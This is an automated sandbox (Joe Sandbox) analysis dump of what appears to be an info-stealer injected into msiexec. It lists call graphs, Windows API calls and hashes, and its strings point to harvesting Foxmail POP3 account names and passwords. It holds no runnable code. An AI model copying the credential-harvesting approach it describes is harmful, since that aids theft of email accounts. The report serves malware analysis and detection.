7759->7760 7760->7762 7761 234b571e _free 20 API calls 7763 234b59fb 7761->7763 7762->7761 7764 234b571e _free 20 API calls 7763->7764 7765 234b5a06 7764->7765 7766 234b571e _free 20 API calls 7765->7766 7767 234b5a11 7766->7767 7768 234b571e _free 20 API calls 7767->7768 7769 234b5a1c 7768->7769 7770 234b571e _free 20 API calls 7769->7770 7771 234b5a27 7770->7771 7772 234b571e _free 20 API calls 7771->7772 7773 234b5a32 7772->7773 7774 234b571e _free 20 API calls 7773->7774 7775 234b5a3d 7774->7775 7776 234b571e _free 20 API calls 7775->7776 7777 234b5a48 7776->7777 7778 234b571e _free 20 API calls 7777->7778 7779 234b5a56 7778->7779 7784 234b589c 7779->7784 7790 234b57a8 7784->7790 7786 234b58c0 7787 234b58ec 7786->7787 7803 234b5809 7787->7803 7789 234b5910 7789->7757 7791 234b57b4 ___DestructExceptionObject 7790->7791 7798 234b5671 RtlEnterCriticalSection 7791->7798 7793 234b57e8 7799 234b57fd 7793->7799 7794 234b57be 7794->7793 7797 234b571e _free 20 API calls 7794->7797 7796 234b57f5 _abort 7796->7786 7797->7793 7798->7794 7802 234b56b9 RtlLeaveCriticalSection 7799->7802 7801 234b5807 7801->7796 7802->7801 7804 234b5815 ___DestructExceptionObject 7803->7804 7811 234b5671 RtlEnterCriticalSection 7804->7811 7806 234b581f 7812 234b5a7f 7806->7812 7808 234b5832 7816 234b5848 7808->7816 7810 234b5840 _abort 7810->7789 7811->7806 7813 234b5ab5 __fassign 7812->7813 7814 234b5a8e __fassign 7812->7814 7813->7808 7814->7813 7815 234b7cc2 __fassign 20 API calls 7814->7815 7815->7813 7819 234b56b9 RtlLeaveCriticalSection 7816->7819 7818 234b5852 7818->7810 7819->7818 7821 234b382d 7820->7821 7825 234b384b ___vcrt_freefls@4 7820->7825 7822 234b383b 7821->7822 7826 234b3b67 7821->7826 7824 234b3ba2 ___vcrt_FlsSetValue 6 API calls 7822->7824 7824->7825 7825->7743 7827 234b3a82 try_get_function 5 API calls 7826->7827 7828 234b3b81 7827->7828 7829 234b3b99 TlsGetValue 7828->7829 7830 234b3b8d 7828->7830 7829->7830 7830->7822 7837 234b3856 7831->7837 7833 234b23f1 7833->7737 
7834 234b53da 7833->7834 7835 234b5b7a _abort 20 API calls 7834->7835 7836 234b23fd 7835->7836 7836->7735 7836->7736 7838 234b385f 7837->7838 7839 234b3862 GetLastError 7837->7839 7838->7833 7840 234b3b67 ___vcrt_FlsGetValue 6 API calls 7839->7840 7841 234b3877 7840->7841 7842 234b38dc SetLastError 7841->7842 7843 234b3ba2 ___vcrt_FlsSetValue 6 API calls 7841->7843 7848 234b3896 7841->7848 7842->7833 7844 234b3890 7843->7844 7845 234b38b8 7844->7845 7846 234b3ba2 ___vcrt_FlsSetValue 6 API calls 7844->7846 7844->7848 7847 234b3ba2 ___vcrt_FlsSetValue 6 API calls 7845->7847 7845->7848 7846->7845 7847->7848 7848->7842 7912 234b4a9a 7915 234b5411 7912->7915 7916 234b541d _abort 7915->7916 7917 234b5af6 _abort 38 API calls 7916->7917 7920 234b5422 7917->7920 7918 234b55a8 _abort 38 API calls 7919 234b544c 7918->7919 7920->7918 7661 234b2418 7662 234b2420 ___scrt_release_startup_lock 7661->7662 7665 234b47f5 7662->7665 7664 234b2448 7666 234b4808 7665->7666 7667 234b4804 7665->7667 7670 234b4815 7666->7670 7667->7664 7671 234b5b7a _abort 20 API calls 7670->7671 7674 234b482c 7671->7674 7672 234b2ada _ValidateLocalCookies 5 API calls 7673 234b4811 7672->7673 7673->7664 7674->7672 6977 234b4bdd 6978 234b4c08 6977->6978 6979 234b4bec 6977->6979 7000 234b6d60 6978->7000 6979->6978 6980 234b4bf2 6979->6980 6982 234b6368 _free 20 API calls 6980->6982 6984 234b4bf7 6982->6984 6986 234b62ac _abort 26 API calls 6984->6986 6985 234b4c33 7004 234b4d01 6985->7004 6988 234b4c01 6986->6988 6992 234b4c72 6995 234b4d01 38 API calls 6992->6995 6993 234b4c66 6994 234b6368 _free 20 API calls 6993->6994 6999 234b4c6b 6994->6999 6996 234b4c88 6995->6996 6998 234b571e _free 20 API calls 6996->6998 6996->6999 6997 234b571e _free 20 API calls 6997->6988 6998->6999 6999->6997 7001 234b4c0f GetModuleFileNameA 7000->7001 7002 234b6d69 7000->7002 7001->6985 7016 234b6c5f 7002->7016 7006 234b4d26 7004->7006 7008 234b4d86 7006->7008 7198 234b70eb 7006->7198 7007 234b4c50 7010 234b4e76 7007->7010 
7008->7007 7009 234b70eb 38 API calls 7008->7009 7009->7008 7011 234b4e8b 7010->7011 7012 234b4c5d 7010->7012 7011->7012 7013 234b637b _abort 20 API calls 7011->7013 7012->6992 7012->6993 7014 234b4eb9 7013->7014 7015 234b571e _free 20 API calls 7014->7015 7015->7012 7017 234b5af6 _abort 38 API calls 7016->7017 7018 234b6c6c 7017->7018 7036 234b6d7e 7018->7036 7020 234b6c74 7045 234b69f3 7020->7045 7023 234b6c8b 7023->7001 7026 234b6cce 7028 234b571e _free 20 API calls 7026->7028 7028->7023 7030 234b6cc9 7031 234b6368 _free 20 API calls 7030->7031 7031->7026 7032 234b6d12 7032->7026 7069 234b68c9 7032->7069 7033 234b6ce6 7033->7032 7034 234b571e _free 20 API calls 7033->7034 7034->7032 7037 234b6d8a ___DestructExceptionObject 7036->7037 7038 234b5af6 _abort 38 API calls 7037->7038 7040 234b6d94 7038->7040 7042 234b55a8 _abort 38 API calls 7040->7042 7043 234b6e18 _abort 7040->7043 7044 234b571e _free 20 API calls 7040->7044 7072 234b5671 RtlEnterCriticalSection 7040->7072 7073 234b6e0f 7040->7073 7042->7040 7043->7020 7044->7040 7077 234b54a7 7045->7077 7048 234b6a26 7050 234b6a3d 7048->7050 7051 234b6a2b GetACP 7048->7051 7049 234b6a14 GetOEMCP 7049->7050 7050->7023 7052 234b56d0 7050->7052 7051->7050 7053 234b570e 7052->7053 7057 234b56de _abort 7052->7057 7054 234b6368 _free 20 API calls 7053->7054 7056 234b570c 7054->7056 7055 234b56f9 RtlAllocateHeap 7055->7056 7055->7057 7056->7026 7059 234b6e20 7056->7059 7057->7053 7057->7055 7058 234b474f _abort 7 API calls 7057->7058 7058->7057 7060 234b69f3 40 API calls 7059->7060 7061 234b6e3f 7060->7061 7064 234b6e90 IsValidCodePage 7061->7064 7066 234b6e46 7061->7066 7068 234b6eb5 ___scrt_fastfail 7061->7068 7062 234b2ada _ValidateLocalCookies 5 API calls 7063 234b6cc1 7062->7063 7063->7030 7063->7033 7065 234b6ea2 GetCPInfo 7064->7065 7064->7066 7065->7066 7065->7068 7066->7062 7089 234b6acb GetCPInfo 7068->7089 7162 234b6886 7069->7162 7071 234b68ed 7071->7026 7072->7040 7076 234b56b9 RtlLeaveCriticalSection 
7073->7076 7075 234b6e16 7075->7040 7076->7075 7078 234b54c4 7077->7078 7079 234b54ba 7077->7079 7078->7079 7080 234b5af6 _abort 38 API calls 7078->7080 7079->7048 7079->7049 7081 234b54e5 7080->7081 7082 234b7a00 __fassign 38 API calls 7081->7082 7083 234b54fe 7082->7083 7085 234b7a2d 7083->7085 7086 234b7a40 7085->7086 7087 234b7a55 7085->7087 7086->7087 7088 234b6d7e __fassign 38 API calls 7086->7088 7087->7079 7088->7087 7090 234b6b05 7089->7090 7098 234b6baf 7089->7098 7099 234b86e4 7090->7099 7093 234b2ada _ValidateLocalCookies 5 API calls 7095 234b6c5b 7093->7095 7095->7066 7097 234b8a3e 43 API calls 7097->7098 7098->7093 7100 234b54a7 __fassign 38 API calls 7099->7100 7101 234b8704 MultiByteToWideChar 7100->7101 7103 234b8742 7101->7103 7111 234b87da 7101->7111 7104 234b8763 ___scrt_fastfail 7103->7104 7107 234b56d0 21 API calls 7103->7107 7106 234b87d4 7104->7106 7110 234b87a8 MultiByteToWideChar 7104->7110 7105 234b2ada _ValidateLocalCookies 5 API calls 7108 234b6b66 7105->7108 7118 234b8801 7106->7118 7107->7104 7113 234b8a3e 7108->7113 7110->7106 7112 234b87c4 GetStringTypeW 7110->7112 7111->7105 7112->7106 7114 234b54a7 __fassign 38 API calls 7113->7114 7115 234b8a51 7114->7115 7122 234b8821 7115->7122 7119 234b881e 7118->7119 7120 234b880d 7118->7120 7119->7111 7120->7119 7121 234b571e _free 20 API calls 7120->7121 7121->7119 7124 234b883c 7122->7124 7123 234b8862 MultiByteToWideChar 7125 234b8a16 7123->7125 7126 234b888c 7123->7126 7124->7123 7127 234b2ada _ValidateLocalCookies 5 API calls 7125->7127 7129 234b56d0 21 API calls 7126->7129 7131 234b88ad 7126->7131 7128 234b6b87 7127->7128 7128->7097 7129->7131 7130 234b88f6 MultiByteToWideChar 7132 234b890f 7130->7132 7148 234b8962 7130->7148 7131->7130 7131->7148 7149 234b5f19 7132->7149 7134 234b8801 __freea 20 API calls 7134->7125 7136 234b8939 7138 234b5f19 11 API calls 7136->7138 7136->7148 7137 234b8971 7140 234b56d0 21 API calls 7137->7140 7143 234b8992 7137->7143 7138->7148 7139 234b8a07 7142 
234b8801 __freea 20 API calls 7139->7142 7140->7143 7141 234b5f19 11 API calls 7144 234b89e6 7141->7144 7142->7148 7143->7139 7143->7141 7144->7139 7145 234b89f5 WideCharToMultiByte 7144->7145 7145->7139 7146 234b8a35 7145->7146 7147 234b8801 __freea 20 API calls 7146->7147 7147->7148 7148->7134 7150 234b5c45 _abort 5 API calls 7149->7150 7151 234b5f40 7150->7151 7153 234b5f49 7151->7153 7157 234b5fa1 7151->7157 7155 234b2ada _ValidateLocalCookies 5 API calls 7153->7155 7156 234b5f9b 7155->7156 7156->7136 7156->7137 7156->7148 7158 234b5c45 _abort 5 API calls 7157->7158 7159 234b5fc8 7158->7159 7160 234b2ada _ValidateLocalCookies 5 API calls 7159->7160 7161 234b5f89 LCMapStringW 7160->7161 7161->7153 7163 234b6892 ___DestructExceptionObject 7162->7163 7170 234b5671 RtlEnterCriticalSection 7163->7170 7165 234b689c 7171 234b68f1 7165->7171 7169 234b68b5 _abort 7169->7071 7170->7165 7183 234b7011 7171->7183 7173 234b693f 7174 234b7011 26 API calls 7173->7174 7175 234b695b 7174->7175 7176 234b7011 26 API calls 7175->7176 7177 234b6979 7176->7177 7178 234b571e _free 20 API calls 7177->7178 7179 234b68a9 7177->7179 7178->7179 7180 234b68bd 7179->7180 7197 234b56b9 RtlLeaveCriticalSection 7180->7197 7182 234b68c7 7182->7169 7184 234b7022 7183->7184 7193 234b701e 7183->7193 7185 234b7029 7184->7185 7188 234b703c ___scrt_fastfail 7184->7188 7186 234b6368 _free 20 API calls 7185->7186 7187 234b702e 7186->7187 7189 234b62ac _abort 26 API calls 7187->7189 7190 234b706a 7188->7190 7191 234b7073 7188->7191 7188->7193 7189->7193 7192 234b6368 _free 20 API calls 7190->7192 7191->7193 7195 234b6368 _free 20 API calls 7191->7195 7194 234b706f 7192->7194 7193->7173 7196 234b62ac _abort 26 API calls 7194->7196 7195->7194 7196->7193 7197->7182 7201 234b7092 7198->7201 7202 234b54a7 __fassign 38 API calls 7201->7202 7203 234b70a6 7202->7203 7203->7006 7675 234b281c 7676 234b2882 std::exception::exception 27 API calls 7675->7676 7677 234b282a 7676->7677 6693 234b5351 6694 234b5374 
6693->6694 6695 234b5360 6693->6695 6696 234b571e _free 20 API calls 6694->6696 6695->6694 6698 234b571e _free 20 API calls 6695->6698 6697 234b5386 6696->6697 6699 234b571e _free 20 API calls 6697->6699 6698->6694 6700 234b5399 6699->6700 6701 234b571e _free 20 API calls 6700->6701 6702 234b53aa 6701->6702 6703 234b571e _free 20 API calls 6702->6703 6704 234b53bb 6703->6704 7849 234b36d0 7850 234b36e2 7849->7850 7852 234b36f0 @_EH4_CallFilterFunc@8 7849->7852 7851 234b2ada _ValidateLocalCookies 5 API calls 7850->7851 7851->7852 7921 234b3c90 RtlUnwind 7853 234b4ed7 7854 234b6d60 51 API calls 7853->7854 7855 234b4ee9 7854->7855 7864 234b7153 GetEnvironmentStringsW 7855->7864 7859 234b571e _free 20 API calls 7860 234b4f29 7859->7860 7861 234b4eff 7862 234b571e _free 20 API calls 7861->7862 7863 234b4ef4 7862->7863 7863->7859 7865 234b716a 7864->7865 7875 234b71bd 7864->7875 7868 234b7170 WideCharToMultiByte 7865->7868 7866 234b4eee 7866->7863 7876 234b4f2f 7866->7876 7867 234b71c6 FreeEnvironmentStringsW 7867->7866 7869 234b718c 7868->7869 7868->7875 7870 234b56d0 21 API calls 7869->7870 7871 234b7192 7870->7871 7872 234b7199 WideCharToMultiByte 7871->7872 7873 234b71af 7871->7873 7872->7873 7874 234b571e _free 20 API calls 7873->7874 7874->7875 7875->7866 7875->7867 7877 234b4f44 7876->7877 7878 234b637b _abort 20 API calls 7877->7878 7889 234b4f6b 7878->7889 7879 234b4fcf 7880 234b571e _free 20 API calls 7879->7880 7881 234b4fe9 7880->7881 7881->7861 7882 234b637b _abort 20 API calls 7882->7889 7883 234b4fd1 7884 234b5000 20 API calls 7883->7884 7886 234b4fd7 7884->7886 7885 234b544d ___std_exception_copy 26 API calls 7885->7889 7887 234b571e _free 20 API calls 7886->7887 7887->7879 7888 234b4ff3 7890 234b62bc _abort 11 API calls 7888->7890 7889->7879 7889->7882 7889->7883 7889->7885 7889->7888 7891 234b571e _free 20 API calls 7889->7891 7892 234b4fff 7890->7892 7891->7889 7204 234b73d5 7205 234b73e1 ___DestructExceptionObject 7204->7205 7216 234b5671 

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 234B1137
                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 234B1151
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 234B115C
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 234B116D
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 234B117C
                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 234B1193
                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 234B11D0
                                                                    • FindClose.KERNEL32(00000000), ref: 234B11DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                    • String ID:
                                                                    • API String ID: 1083526818-0
                                                                    • Opcode ID: d92012f640373d80fb8c0db6523236a1c779b7b821fa95cbc49f3cb78194e1eb
                                                                    • Instruction ID: 501e382b25e4a28cfc5745c1cb17abbf772c4edbe8e37a5c6130506151c41fae
                                                                    • Opcode Fuzzy Hash: d92012f640373d80fb8c0db6523236a1c779b7b821fa95cbc49f3cb78194e1eb
                                                                    • Instruction Fuzzy Hash: 952193729043486BD724EA749C48F9B7BEDEF84718F0409AAB958D3190EB34D60587AA

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 234B1434
                                                                      • Part of subcall function 234B10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 234B1137
                                                                      • Part of subcall function 234B10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 234B1151
                                                                      • Part of subcall function 234B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 234B115C
                                                                      • Part of subcall function 234B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 234B116D
                                                                      • Part of subcall function 234B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 234B117C
                                                                      • Part of subcall function 234B10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 234B1193
                                                                      • Part of subcall function 234B10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 234B11D0
                                                                      • Part of subcall function 234B10F1: FindClose.KERNEL32(00000000), ref: 234B11DB
                                                                    • lstrlenW.KERNEL32(?), ref: 234B14C5
                                                                    • lstrlenW.KERNEL32(?), ref: 234B14E0
                                                                    • lstrlenW.KERNEL32(?,?), ref: 234B150F
                                                                    • lstrcatW.KERNEL32(00000000), ref: 234B1521
                                                                    • lstrlenW.KERNEL32(?,?), ref: 234B1547
                                                                    • lstrcatW.KERNEL32(00000000), ref: 234B1553
                                                                    • lstrlenW.KERNEL32(?,?), ref: 234B1579
                                                                    • lstrcatW.KERNEL32(00000000), ref: 234B1585
                                                                    • lstrlenW.KERNEL32(?,?), ref: 234B15AB
                                                                    • lstrcatW.KERNEL32(00000000), ref: 234B15B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                    • String ID: )$Foxmail$ProgramFiles
                                                                    • API String ID: 672098462-2938083778
                                                                    • Opcode ID: b762f96c1d2b561daffdf747e9363e33b30928cb6fbc6d4ce18d214b16aae365
                                                                    • Instruction ID: 3a5b90fbb72883e8c5464f1f3704d9f7cd7995fa37a592ab80e98af52ffe5e42
                                                                    • Opcode Fuzzy Hash: b762f96c1d2b561daffdf747e9363e33b30928cb6fbc6d4ce18d214b16aae365
                                                                    • Instruction Fuzzy Hash: BC81A175A00358AADB30DBA19C85FDE7379EF84700F0005DAF508E7190EA715A86CFA9
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 234B61DA
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 234B61E4
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 234B61F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: c960b1c5abeafe61067992dde98395806ff069485f0969203fc3482b68e284b6
                                                                    • Instruction ID: f8a599b2a0afa926255b5d1bfb7f5d25b59c0039739a1e95a3cfa9f0b75aa65a
                                                                    • Opcode Fuzzy Hash: c960b1c5abeafe61067992dde98395806ff069485f0969203fc3482b68e284b6
                                                                    • Instruction Fuzzy Hash: BF31D674D1121C9BCB25DF24D98878DBBB9FF18710F5041DAE81CA7250EB349B818F59
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(?,?,234B4A8A,?,234C2238,0000000C,234B4BBD,00000000,00000000,?,234B2082,234C2108,0000000C,234B1F3A,?), ref: 234B4AD5
                                                                    • TerminateProcess.KERNEL32(00000000,?,234B4A8A,?,234C2238,0000000C,234B4BBD,00000000,00000000,?,234B2082,234C2108,0000000C,234B1F3A,?), ref: 234B4ADC
                                                                    • ExitProcess.KERNEL32 ref: 234B4AEE
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: b82db744dc422efc253e54459719f70a37581feb6b9343b315e6b1e944934018
                                                                    • Instruction ID: 0b2f132a41f452d7ba6118f3ec95e80d52faa11eb560299e261636f0e19a59bc
                                                                    • Opcode Fuzzy Hash: b82db744dc422efc253e54459719f70a37581feb6b9343b315e6b1e944934018
                                                                    • Instruction Fuzzy Hash: 6EE04F35900204EFCF057F14CD08A493BBBEF25745B5044D4FA0467221DB39D943CA68
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .
                                                                    • API String ID: 0-248832578
                                                                    • Opcode ID: 7fd91671dbb39c9316938cd3e4193dfdadacde1ed467dad587a550fb4704c848
                                                                    • Instruction ID: db8b6c644eead49c6329e8856f0807f91b09a77602217c4be432b39d6e95998e
                                                                    • Opcode Fuzzy Hash: 7fd91671dbb39c9316938cd3e4193dfdadacde1ed467dad587a550fb4704c848
                                                                    • Instruction Fuzzy Hash: 1F312672D00209AFCB149E78CC84EEA7BBFDB85304F0401ECE919D7251E6399A458B74
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: HeapProcess
                                                                    • String ID:
                                                                    • API String ID: 54951025-0
                                                                    • Opcode ID: 7422ebf68d6e1d93fdf97a99af4cef7845df4c2114651da192e8a348ecb7fa51
                                                                    • Instruction ID: 72d32a4285639ea6288b2e6869013d2c2106cf4b954e61d552dd53c9cd0f1e69
                                                                    • Opcode Fuzzy Hash: 7422ebf68d6e1d93fdf97a99af4cef7845df4c2114651da192e8a348ecb7fa51
                                                                    • Instruction Fuzzy Hash: 0DA01130A002038F8308AE30820A20C3AEEAA2228C30088EAA808E0000FF2CC0008A08

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 234B1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 234B1D1B
                                                                      • Part of subcall function 234B1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 234B1D37
                                                                      • Part of subcall function 234B1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 234B1D4B
                                                                    • _strlen.LIBCMT ref: 234B1855
                                                                    • _strlen.LIBCMT ref: 234B1869
                                                                    • _strlen.LIBCMT ref: 234B188B
                                                                    • _strlen.LIBCMT ref: 234B18AE
                                                                    • _strlen.LIBCMT ref: 234B18C8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen$File$CopyCreateDelete
                                                                    • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                    • API String ID: 3296212668-3023110444
                                                                    • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                    • Instruction ID: c027857f9ee2de645b0aa92502889d8c02137e55bb97af2cce669aad26c96e1e
                                                                    • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                    • Instruction Fuzzy Hash: AE61F171D00358AEEF219BA8C880BDEB7BBAF15640F4440DAD605A7350EB745A47CF6E

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID: %m$~$Gon~$~F@7$~dra
                                                                    • API String ID: 4218353326-230879103
                                                                    • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                    • Instruction ID: 1d0150790143240434a60cd33f28e81cb1084e8c22b393397632b7574e5a263c
                                                                    • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                    • Instruction Fuzzy Hash: D2711571D002285FDF21ABB49C84ADF7BFE9F19600F5440DADA44E7241E6749786CBB8

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • ___free_lconv_mon.LIBCMT ref: 234B7D06
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B90D7
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B90E9
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B90FB
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B910D
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B911F
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B9131
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B9143
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B9155
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B9167
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B9179
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B918B
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B919D
                                                                      • Part of subcall function 234B90BA: _free.LIBCMT ref: 234B91AF
                                                                    • _free.LIBCMT ref: 234B7CFB
                                                                      • Part of subcall function 234B571E: HeapFree.KERNEL32(00000000,00000000,?,234B924F,?,00000000,?,00000000,?,234B9276,?,00000007,?,?,234B7E5A,?), ref: 234B5734
                                                                      • Part of subcall function 234B571E: GetLastError.KERNEL32(?,?,234B924F,?,00000000,?,00000000,?,234B9276,?,00000007,?,?,234B7E5A,?,?), ref: 234B5746
                                                                    • _free.LIBCMT ref: 234B7D1D
                                                                    • _free.LIBCMT ref: 234B7D32
                                                                    • _free.LIBCMT ref: 234B7D3D
                                                                    • _free.LIBCMT ref: 234B7D5F
                                                                    • _free.LIBCMT ref: 234B7D72
                                                                    • _free.LIBCMT ref: 234B7D80
                                                                    • _free.LIBCMT ref: 234B7D8B
                                                                    • _free.LIBCMT ref: 234B7DC3
                                                                    • _free.LIBCMT ref: 234B7DCA
                                                                    • _free.LIBCMT ref: 234B7DE7
                                                                    • _free.LIBCMT ref: 234B7DFF
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                    • String ID:
                                                                    • API String ID: 161543041-0
                                                                    • Opcode ID: 782ff1c9af1b1e4cb7325538b9883461fc7a327537b865d39a526bc95ea81f72
                                                                    • Instruction ID: b218de88378cd9a5db3aaa8250f25482c1218f6662bbad1450c5b5389f29a601
                                                                    • Opcode Fuzzy Hash: 782ff1c9af1b1e4cb7325538b9883461fc7a327537b865d39a526bc95ea81f72
